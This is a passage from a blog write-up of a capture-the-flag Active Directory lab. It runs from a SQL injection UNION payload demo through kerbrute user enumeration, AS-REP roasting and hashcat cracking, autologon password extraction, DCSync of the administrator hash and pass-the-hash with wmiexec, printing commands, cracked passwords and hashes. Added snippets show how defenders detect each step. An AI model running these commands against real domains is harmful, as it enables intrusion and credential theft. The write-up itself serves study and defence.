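    return conn.execute(sql, (username, password)).fetchone() is not None


# The UNION form sqlmap reported: three columns, NULL padding, trailing
# comment. 'marker' stands in for sqlmap's CONCAT(0x716b626b71, ..., 0x717a716b71)
# column; the "-- -" comments out the rest of the original WHERE clause.
UNION_PAYLOAD = "admin' UNION ALL SELECT NULL,'marker',NULL-- -"


def demo():
    """Run real credentials and the UNION payload through both versions."""
    conn = make_db()
    return {
        "legit_vulnerable": login_vulnerable(conn, "administrator", "example-only-password"),
        "legit_fixed": login_fixed(conn, "administrator", "example-only-password"),
        # The injected UNION contributes a row of its own, so the vulnerable
        # login accepts a user that does not exist; the fixed login does not.
        "union_vulnerable": login_vulnerable(conn, UNION_PAYLOAD, "admin123"),
        "union_fixed": login_fixed(conn, UNION_PAYLOAD, "admin123"),
    }


if __name__ == "__main__":
    for name, ok in demo().items():
        print(f"{name}: {'login accepted' if ok else 'login rejected'}")
```

The time-based blind payload sqlmap also found relies on MySQL's SLEEP(), which SQLite lacks, so only the UNION case is exercised here.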

Use kerbrute to enumerate domain user names:

meterpreter > execute -i -H -f /home/neo4j/kerbrute_linux_amd64 -a "userenum --dc 172.22.6.12 -d xiaorang.lab /home/neo4j/user.txt"
Process 35652 created.
Channel 13 created.

    __             __               __
   / /_____  _____/ /_  _______  __/ /____
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/

Version: v1.0.3 (9dad6e1) - 05/18/23 - Ronnie Flathers @ropnop

2023/05/18 11:35:25 >  Using KDC(s):
2023/05/18 11:35:25 >   172.22.6.12:88

2023/05/18 11:35:25 >  [+] VALID USERNAME:       weixian@xiaorang.lab
2023/05/18 11:35:25 >  [+] VALID USERNAME:       shuzhen@xiaorang.lab
2023/05/18 11:35:25 >  [+] VALID USERNAME:       gaiyong@xiaorang.lab
2023/05/18 11:35:25 >  [+] VALID USERNAME:       xiqidi@xiaorang.lab
2023/05/18 11:35:25 >  [+] VALID USERNAME:       wengbang@xiaorang.lab
2023/05/18 11:35:25 >  [+] VALID USERNAME:       xuanjiang@xiaorang.lab
2023/05/18 11:35:25 >  [+] VALID USERNAME:       yuanchang@xiaorang.lab
2023/05/18 11:35:25 >  [+] VALID USERNAME:       lvhui@xiaorang.lab
2023/05/18 11:35:25 >  [+] VALID USERNAME:       wenbo@xiaorang.lab
2023/05/18 11:35:25 >  [+] VALID USERNAME:       zhenjun@xiaorang.lab
2023/05/18 11:35:25 >  [+] VALID USERNAME:       jinqing@xiaorang.lab
2023/05/18 11:35:25 >  [+] VALID USERNAME:       yangju@xiaorang.lab
2023/05/18 11:35:25 >  [+] VALID USERNAME:       weicheng@xiaorang.lab
2023/05/18 11:35:25 >  [+] VALID USERNAME:       weixian@xiaorang.lab
2023/05/18 11:35:25 >  [+] VALID USERNAME:       jizhen@xiaorang.lab
2023/05/18 11:35:25 >  [+] VALID USERNAME:       haobei@xiaorang.lab
2023/05/18 11:35:25 >  [+] VALID USERNAME:       jingze@xiaorang.lab
2023/05/18 11:35:25 >  [+] VALID USERNAME:       rubao@xiaorang.lab
2023/05/18 11:35:25 >  [+] VALID USERNAME:       zhaoxiu@xiaorang.lab
2023/05/18 11:35:25 >  [+] VALID USERNAME:       tangshun@xiaorang.lab
2023/05/18 11:35:25 >  [+] VALID USERNAME:       qiyue@xiaorang.lab
2023/05/18 11:35:25 >  [+] VALID USERNAME:       liangliang@xiaorang.lab
2023/05/18 11:35:25 >  [+] VALID USERNAME:       jicheng@xiaorang.lab
2023/05/18 11:35:25 >  [+] VALID USERNAME:       chouqian@xiaorang.lab
2023/05/18 11:35:25 >  [+] VALID USERNAME:       beijin@xiaorang.lab
2023/05/18 11:35:25 >  [+] VALID USERNAME:       xiyi@xiaorang.lab
2023/05/18 11:35:25 >  [+] VALID USERNAME:       chenghui@xiaorang.lab
2023/05/18 11:35:25 >  [+] VALID USERNAME:       chebin@xiaorang.lab
2023/05/18 11:35:25 >  [+] VALID USERNAME:       pengyuan@xiaorang.lab
2023/05/18 11:35:25 >  [+] VALID USERNAME:       yanglang@xiaorang.lab
2023/05/18 11:35:25 >  [+] VALID USERNAME:       duanmuxiao@xiaorang.lab
2023/05/18 11:35:25 >  [+] VALID USERNAME:       jihuan@xiaorang.lab
2023/05/18 11:35:25 >  [+] VALID USERNAME:       hongzhi@xiaorang.lab
2023/05/18 11:35:25 >  [+] VALID USERNAME:       gaijin@xiaorang.lab
2023/05/18 11:35:25 >  [+] VALID USERNAME:       zhufeng@xiaorang.lab
2023/05/18 11:35:25 >  [+] VALID USERNAME:       tangrong@xiaorang.lab
2023/05/18 11:35:25 >  [+] VALID USERNAME:       yifu@xiaorang.lab
2023/05/18 11:35:25 >  [+] VALID USERNAME:       luwan@xiaorang.lab
2023/05/18 11:35:25 >  [+] VALID USERNAME:       lili@xiaorang.lab
2023/05/18 11:35:25 >  [+] VALID USERNAME:       lianhuangchen@xiaorang.lab
2023/05/18 11:35:25 >  [+] VALID USERNAME:       dongcheng@xiaorang.lab
2023/05/18 11:35:25 >  [+] VALID USERNAME:       rangsibo@xiaorang.lab
2023/05/18 11:35:25 >  [+] VALID USERNAME:       huabi@xiaorang.lab
2023/05/18 11:35:25 >  [+] VALID USERNAME:       fusong@xiaorang.lab
2023/05/18 11:35:25 >  [+] VALID USERNAME:       wohua@xiaorang.lab
2023/05/18 11:35:25 >  [+] VALID USERNAME:       haoguang@xiaorang.lab
2023/05/18 11:35:25 >  [+] VALID USERNAME:       wenshao@xiaorang.lab
2023/05/18 11:35:25 >  [+] VALID USERNAME:       langying@xiaorang.lab
2023/05/18 11:35:25 >  [+] VALID USERNAME:       diaocai@xiaorang.lab
2023/05/18 11:35:25 >  [+] VALID USERNAME:       lianggui@xiaorang.lab
2023/05/18 11:35:25 >  [+] VALID USERNAME:       baqin@xiaorang.lab
2023/05/18 11:35:25 >  [+] VALID USERNAME:       manxue@xiaorang.lab
2023/05/18 11:35:25 >  [+] VALID USERNAME:       weishengshan@xiaorang.lab
2023/05/18 11:35:25 >  [+] VALID USERNAME:       louyou@xiaorang.lab
2023/05/18 11:35:25 >  [+] VALID USERNAME:       chengqiu@xiaorang.lab
2023/05/18 11:35:25 >  [+] VALID USERNAME:       chuyuan@xiaorang.lab
2023/05/18 11:35:25 >  [+] VALID USERNAME:       wenbiao@xiaorang.lab
2023/05/18 11:35:25 >  [+] VALID USERNAME:       maqun@xiaorang.lab
2023/05/18 11:35:25 >  [+] VALID USERNAME:       yulvxue@xiaorang.lab
2023/05/18 11:35:25 >  [+] VALID USERNAME:       wenliang@xiaorang.lab
2023/05/18 11:35:25 >  [+] VALID USERNAME:       luyue@xiaorang.lab
2023/05/18 11:35:25 >  [+] VALID USERNAME:       pangzhen@xiaorang.lab
2023/05/18 11:35:25 >  [+] VALID USERNAME:       ganjian@xiaorang.lab
2023/05/18 11:35:25 >  [+] VALID USERNAME:       lezhong@xiaorang.lab
2023/05/18 11:35:25 >  [+] VALID USERNAME:       guohong@xiaorang.lab
2023/05/18 11:35:25 >  [+] VALID USERNAME:       sheweiyue@xiaorang.lab
2023/05/18 11:35:25 >  [+] VALID USERNAME:       dujian@xiaorang.lab
2023/05/18 11:35:25 >  [+] VALID USERNAME:       lidongjin@xiaorang.lab
2023/05/18 11:35:25 >  [+] VALID USERNAME:       hongqun@xiaorang.lab
2023/05/18 11:35:25 >  [+] VALID USERNAME:       yexing@xiaorang.lab
2023/05/18 11:35:25 >  [+] VALID USERNAME:       maoda@xiaorang.lab
2023/05/18 11:35:25 >  [+] VALID USERNAME:       qiaomei@xiaorang.lab
2023/05/18 11:35:25 >  [+] VALID USERNAME:       zhangxin@xiaorang.lab
2023/05/18 11:35:25 >  [+] VALID USERNAME:       ganjian@xiaorang.lab
2023/05/18 11:35:25 >  Done! Tested 500 usernames (74 valid) in 0.058 seconds

AS-REP Roasting

Try AS-REP Roasting: from the given username list, collect the AS-REP responses of the users configured with "Do not require Kerberos preauthentication":

┌──(root㉿kali)-[~]
└─# proxychains4 -q impacket-GetNPUsers xiaorang.lab/ -dc-ip 172.22.6.12 -usersfile user.txt -format hashcat -outputfile hashes.txt
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

[-] User weixian@xiaorang.lab doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User shuzhen@xiaorang.lab doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User gaiyong@xiaorang.lab doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User xiqidi@xiaorang.lab doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User wengbang@xiaorang.lab doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User xuanjiang@xiaorang.lab doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User yuanchang@xiaorang.lab doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User lvhui@xiaorang.lab doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User wenbo@xiaorang.lab doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User zhenjun@xiaorang.lab doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User jinqing@xiaorang.lab doesn't have UF_DONT_REQUIRE_PREAUTH set
......

These responses are encrypted with the user's password and can therefore be cracked offline with hashcat:

┌──(root㉿kali)-[~]
└─# hashcat -m 18200 hashes.txt rockyou.txt --show
$krb5asrep$23$wenshao@xiaorang.lab@XIAORANG.LAB:1c7b0758558a343ae9818ba9651671e0$74d2e04c05cf4b70aa1b3a8a29ca50bd8b72c9c3d0f6edfa1c5e0291173e073718c88d8f9289324d22a32fd3da70fdb0acdc11572540e53b69bab9c114dc3800b2a4e707cdc90c92c395efa6a81febe061c12563bdb22061422b51e6985efcc39207655152b9e07bc51fe9dbc696415c6c444a7eda4e3d65cef2a21ed0b9db129abfa224d573cb2ff241198c1bb9fd15f8cf8a5a2023e6b1404086edd6bbdda6d1d8bb94bc97a242ca2df79b0d32df1c9959cf7f7326615f8df5b241394705a61d732283731670c644f54d1f71786fe4ad40829245bb846d1b7da55988ead0a9ce3c4984e3d3cf2be400b0dc:hellokitty
$krb5asrep$23$zhangxin@xiaorang.lab@XIAORANG.LAB:1d877fa7ed93abba0b6eea699e59115b$b1118c32f1356e3f85bd415396ba79efd50ff5031b3a9bd2e98fe8ab45e0aba9eb7abac99116a2991f284fb6c98e7265849a5718bda72a3092c2d5eef012cb8696d01a79894326ac3a7c0d333ba9ba97407bcd65c3299b67978af9d053b0c000660caa03d0a4e97b10f18f0fb81defd52ec01727f94e38fbfaead6b65c934e8d22382b85d59e12f88164fee3cc48888164a3ca5cd43fcf551ec411655293cec72ea8f96e208fb875ac23079511ced4642fb9997ad63eafd16517203753a77530259c31291381dbc8269f07ad3ba89932a017756252e38c108592aaaa4ac9c84f4c50603fd5d26b725fdfc4aa:strawberry
| Account | Password |
| --- | --- |
| wenshao@xiaorang.lab | hellokitty |
| zhangxin@xiaorang.lab | strawberry |
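The defender's side of the two steps above, as an added example that is not part of the original writeup: an audit of the userAccountControl flag that GetNPUsers looks for, and a check over Security event 4768 records for TGT requests made without pre-authentication (the `$23$` in the hashcat lines is etype 23, RC4-HMAC, which shows up as Ticket Encryption Type 0x17). The LDAP values, event records and IP addresses are constructed samples.

```python
"""Added example (not from the original writeup): the defender's side of
AS-REP Roasting. Both the LDAP attribute values and the 4768 event records
below are constructed samples, not data from the xiaorang.lab environment."""
import re

# userAccountControl bits; UF_DONT_REQUIRE_PREAUTH is the flag GetNPUsers checks.
UF_ACCOUNTDISABLE = 0x0002
UF_DONT_REQUIRE_PREAUTH = 0x400000

# Constructed sample of (sAMAccountName, userAccountControl) as an LDAP query returns them.
SAMPLE_ACCOUNTS = [
    {"sAMAccountName": "weixian",  "userAccountControl": 0x10200},   # normal account, preauth required
    {"sAMAccountName": "wenshao",  "userAccountControl": 0x410200},  # preauth disabled -> roastable
    {"sAMAccountName": "zhangxin", "userAccountControl": 0x410200},  # preauth disabled -> roastable
    {"sAMAccountName": "oldsvc",   "userAccountControl": 0x410202},  # preauth disabled, but account disabled
]

def roastable_accounts(accounts):
    """Enabled accounts whose userAccountControl has DONT_REQUIRE_PREAUTH set."""
    return sorted(
        a["sAMAccountName"] for a in accounts
        if a["userAccountControl"] & UF_DONT_REQUIRE_PREAUTH
        and not a["userAccountControl"] & UF_ACCOUNTDISABLE
    )

# Constructed, flattened form of Security event 4768 (Kerberos TGT requested).
# An AS-REP roast shows Pre-Authentication Type 0; the etype-23 hashes cracked
# above correspond to Ticket Encryption Type 0x17 (RC4-HMAC).
SAMPLE_4768 = [
    "EventID=4768 TargetUserName=wenshao ServiceName=krbtgt TicketEncryptionType=0x17 PreAuthType=0 IpAddress=::ffff:10.0.0.5",
    "EventID=4768 TargetUserName=yuxuan ServiceName=krbtgt TicketEncryptionType=0x12 PreAuthType=2 IpAddress=::ffff:10.0.0.9",
    "EventID=4768 TargetUserName=zhangxin ServiceName=krbtgt TicketEncryptionType=0x17 PreAuthType=0 IpAddress=::ffff:10.0.0.5",
    "EventID=4768 TargetUserName=WIN2019$ ServiceName=krbtgt TicketEncryptionType=0x12 PreAuthType=2 IpAddress=::ffff:10.0.0.9",
]
FIELD = re.compile(r"(\w+)=(\S+)")

def asrep_roast_candidates(events):
    """Return (user, source_ip, etype) for TGT requests made without pre-authentication."""
    hits = []
    for line in events:
        f = dict(FIELD.findall(line))
        if f.get("EventID") != "4768" or f.get("PreAuthType") != "0":
            continue
        # AES replies (0x11/0x12) are roastable too; 0x17 is just the cheapest to crack.
        hits.append((f["TargetUserName"], f["IpAddress"].replace("::ffff:", ""), f["TicketEncryptionType"]))
    return hits
```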

These credentials can log in to the host WIN2019$:

┌──(kali㉿kali)-[~]
└─$ proxychains4 -q cme rdp 172.22.6.38/24 -u user.txt -p pass.txt --no-bruteforce
RDP         172.22.6.25     3389   WIN2019          [*] Windows 10 or Windows Server 2016 Build 17763 (name:WIN2019) (domain:xiaorang.lab) (nla:True)
RDP         172.22.6.12     3389   DC-PROGAME       [*] Windows 10 or Windows Server 2016 Build 14393 (name:DC-PROGAME) (domain:xiaorang.lab) (nla:True)
RDP         172.22.6.25     3389   WIN2019          [+] xiaorang.lab\wenshao:hellokitty (Pwn3d!)
RDP         172.22.6.12     3389   DC-PROGAME       [+] xiaorang.lab\wenshao:hellokitty
RDP         172.22.6.12     3389   DC-PROGAME       [+] xiaorang.lab\zhangxin:strawberry

AD recon with BloodHound

Domain environment analysis:

PS C:\Users\wenshao\Desktop> .\SharpHound.exe -c all
2023-05-18T14:27:27.2072983+08:00|INFORMATION|This version of SharpHound is compatible with the 4.2 Release of BloodHound
2023-05-18T14:27:27.3799607+08:00|INFORMATION|Resolved Collection Methods: Group, LocalAdmin, GPOLocalGroup, Session, LoggedOn, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets, PSRemote
2023-05-18T14:27:27.3957557+08:00|INFORMATION|Initializing SharpHound at 14:27 on 2023/5/18
2023-05-18T14:27:27.5525204+08:00|INFORMATION|Flags: Group, LocalAdmin, GPOLocalGroup, Session, LoggedOn, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets, PSRemote
2023-05-18T14:27:27.7100612+08:00|INFORMATION|Beginning LDAP search for xiaorang.lab
2023-05-18T14:27:27.7570758+08:00|INFORMATION|Producer has finished, closing LDAP channel
2023-05-18T14:27:27.7725786+08:00|INFORMATION|LDAP channel closed, waiting for consumers
2023-05-18T14:27:58.4591622+08:00|INFORMATION|Status: 0 objects finished (+0 0)/s -- Using 36 MB RAM
2023-05-18T14:28:12.5330660+08:00|INFORMATION|Consumers finished, closing output channel
2023-05-18T14:28:12.5988949+08:00|INFORMATION|Output channel closed, waiting for output task to complete
Closing writers
2023-05-18T14:28:12.7316697+08:00|INFORMATION|Status: 166 objects finished (+166 3.688889)/s -- Using 43 MB RAM
2023-05-18T14:28:12.7316697+08:00|INFORMATION|Enumeration finished in 00:00:45.0209904
2023-05-18T14:28:12.8119456+08:00|INFORMATION|Saving cache with stats: 124 ID to type mappings.
 126 name to SID mappings.
 1 machine sid mappings.
 2 sid to domain mappings.
 0 global catalog mappings.
2023-05-18T14:28:12.8275552+08:00|INFORMATION|SharpHound Enumeration Completed at 14:28 on 2023/5/18! Happy Graphing!

image.png

HasSession

The user YUXUAN@XIAORANG.LAB has a session on the computer WIN2019.XIAORANG.LAB. Credentials could be retrieved by means such as LSASS injection, token theft, or injecting into the user's processes.

The user's directory is found under C:\Users:

image.png

This domain user has auto-logon configured on the current host, so the MSF module can retrieve the plaintext password from the registry:

meterpreter > run post/windows/gather/credentials/windows_autologin

[*] Running against WIN2019 on session 1
[+] AutoAdminLogon=1, DefaultDomain=xiaorang.lab, DefaultUser=yuxuan, DefaultPassword=Yuxuan7QbrgZ3L
meterpreter >

The registry location can also be read directly to obtain the plaintext password configured for auto-logon:

reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"
| Account | Password |
| --- | --- |
| xiaorang.lab\yuxuan | Yuxuan7QbrgZ3L |

HasSIDHistory

The domain user YUXUAN has the SID of the domain administrator ADMINISTRATOR in its SIDHistory attribute. When a Kerberos ticket is created for YUXUAN, it will contain ADMINISTRATOR's SID, thereby granting YUXUAN the same privileges and permissions as ADMINISTRATOR.

SID History is a legitimate mechanism used when migrating security principals between domains, so that every authorization referring to their previous SIDs keeps working.

When crossing a domain trust boundary, this attack does not work if the trust between the two domains enforces SID filtering, because the SIDs in the ExtraSIDs section of the domain user's Kerberos ticket PAC will be ignored.
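An audit for the misuse described in the three paragraphs above, as an added example that is not part of the original writeup: a legitimate migration only ever carries SIDs from another domain, so a sIDHistory entry from the current domain, or one ending in a privileged well-known RID, is flagged. The directory objects are constructed; the domain SID is the one shown in this writeup's DCSync output, and "S-1-5-21-111-222-333" stands for a retired source domain.

```python
"""Added example (not from the original writeup): auditing sIDHistory for the
same-domain, privileged-SID injection described above. The sample objects are
constructed; the domain SID is the one shown in this writeup's DCSync output."""
DOMAIN_SID = "S-1-5-21-3623938633-4064111800-2925858365"

# Well-known RIDs that should never appear in anyone's sIDHistory.
PRIVILEGED_RIDS = {500: "Administrator", 512: "Domain Admins",
                   518: "Schema Admins", 519: "Enterprise Admins"}

# Constructed directory objects; "S-1-5-21-111-222-333" stands for a retired domain.
SAMPLE_OBJECTS = [
    {"sAMAccountName": "yuxuan",   "sIDHistory": [DOMAIN_SID + "-500"]},
    {"sAMAccountName": "wenshao",  "sIDHistory": []},
    {"sAMAccountName": "migrated", "sIDHistory": ["S-1-5-21-111-222-333-1050"]},
    {"sAMAccountName": "svc-old",  "sIDHistory": ["S-1-5-21-111-222-333-512"]},
]

def split_sid(sid):
    """Split 'S-1-5-21-a-b-c-rid' into (domain part, rid)."""
    domain, _, rid = sid.rpartition("-")
    return domain, int(rid)

def audit_sid_history(objects, current_domain_sid):
    """Flag sIDHistory entries that cannot be a legitimate migration artefact."""
    findings = []
    for obj in objects:
        for hist in obj["sIDHistory"]:
            domain, rid = split_sid(hist)
            reasons = []
            if domain == current_domain_sid:
                # Migration only ever carries SIDs from *another* domain.
                reasons.append("same-domain SID")
            if rid in PRIVILEGED_RIDS:
                reasons.append("privileged RID %d (%s)" % (rid, PRIVILEGED_RIDS[rid]))
            if reasons:
                findings.append((obj["sAMAccountName"], hist, reasons))
    return findings
```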

┌──(root㉿kali)-[~]
└─# proxychains4 -q cme rdp 172.22.6.38/24 -u yuxuan -p Yuxuan7QbrgZ3L
RDP         172.22.6.12     3389   DC-PROGAME       [*] Windows 10 or Windows Server 2016 Build 14393 (name:DC-PROGAME) (domain:xiaorang.lab) (nla:True)
RDP         172.22.6.25     3389   WIN2019          [*] Windows 10 or Windows Server 2016 Build 17763 (name:WIN2019) (domain:xiaorang.lab) (nla:True)
RDP         172.22.6.12     3389   DC-PROGAME       [+] xiaorang.lab\yuxuan:Yuxuan7QbrgZ3L (Pwn3d!)
RDP         172.22.6.25     3389   WIN2019          [+] xiaorang.lab\yuxuan:Yuxuan7QbrgZ3L (Pwn3d!)

DCSync

This account can log in to the domain controller DC-PROGAME$ and has permission to read the flag directly:

Awesome! you got the final flag.

::::::::::::::::::::::::::    :::: ::::::::::
    :+:        :+:    +:+:+: :+:+:+:+:
    +:+        +:+    +:+ +:+:+ +:++:+
    +#+        +#+    +#+  +:+  +#++#++:++#
    +#+        +#+    +#+       +#++#+
    #+#        #+#    #+#       #+##+#
    ###    ##############       #############


flag04: flag{17c2c7eb-6dcf-4c08-9c18-35a91a01b8ac}

Note: the domain user yuxuan's credentials can log in to the host WIN2019.XIAORANG.LAB, but cannot get into the local administrator user's home directory, which is a bit puzzling 😶‍🌫️.

There is still no third flag, so use yuxuan's account to run a DCSync:

meterpreter > dcsync_ntlm administrator
[+] Account   : administrator
[+] NTLM Hash : 04d93ffd6f5f6e4490e0de23f240a5e9
[+] LM Hash   : <NOT FOUND>
[+] SID       : S-1-5-21-3623938633-4064111800-2925858365-500
[+] RID       : 500
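How the DCSync above shows up on the domain controller, as an added example that is not part of the original writeup: a DCSync caller exercises the DS-Replication-Get-Changes control-access rights on the domain object, which Security event 4662 records with the rights' GUIDs, so replication access by any principal other than a domain controller is the signal. The 4662 records are constructed (the replication GUIDs are the real ones; the third record's GUID is a placeholder), and the account names are the ones used in this writeup.

```python
"""Added example (not from the original writeup): spotting DCSync in Security
event 4662. The events below are constructed; the account names are the ones
used in this writeup, the replication GUIDs are the real control-access rights."""
import re

# Control-access rights a DCSync caller needs on the domain object.
REPLICATION_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
}
# Principals expected to replicate: the domain controllers (only one in this lab).
EXPECTED_REPLICATORS = {"DC-PROGAME$"}

# Constructed, flattened 4662 records; Properties carries the access-right GUIDs
# and AccessMask 0x100 is "Control Access". The third GUID is a placeholder.
SAMPLE_4662 = [
    "EventID=4662 SubjectUserName=DC-PROGAME$ ObjectType=domainDNS AccessMask=0x100 Properties={1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}",
    "EventID=4662 SubjectUserName=yuxuan ObjectType=domainDNS AccessMask=0x100 Properties={1131f6aa-9c07-11d1-f79f-00c04fc2dcd2};{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}",
    "EventID=4662 SubjectUserName=wenshao ObjectType=user AccessMask=0x20 Properties={00000000-0000-0000-0000-00000000aaaa}",
]
FIELD = re.compile(r"(\w+)=(\S+)")
GUID = re.compile(r"[0-9a-f-]{36}")

def dcsync_suspects(events, expected=EXPECTED_REPLICATORS):
    """Return (account, [rights]) for replication access by non-DC principals."""
    hits = []
    for line in events:
        f = dict(FIELD.findall(line))
        if f.get("EventID") != "4662":
            continue
        rights = [REPLICATION_RIGHTS[g] for g in GUID.findall(f.get("Properties", ""))
                  if g in REPLICATION_RIGHTS]
        if rights and f["SubjectUserName"] not in expected:
            hits.append((f["SubjectUserName"], rights))
    return hits
```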

Use the domain admin credentials to log in to host WIN2019$ via pass-the-hash:

┌──(root㉿kali)-[~]
└─# proxychains4 -q impacket-wmiexec xiaorang.lab/Administrator@172.22.6.25 -hashes :04d93ffd6f5f6e4490e0de23f240a5e9 -codec gbk
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

[*] SMBv3.0 dialect used
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\>
......

C:\users\Administrator\flag>type flag03.txt
flag03: flag{2f6c2b5a-092d-4902-af29-d7603f309d39}


Maybe you can find something interesting on this server.
=======================================
What you may not know is that many objects in this domain
are moved from other domains.

C:\users\Administrator\flag>
This post is licensed under CC BY 4.0 by the author.

© h0ny. Some rights reserved.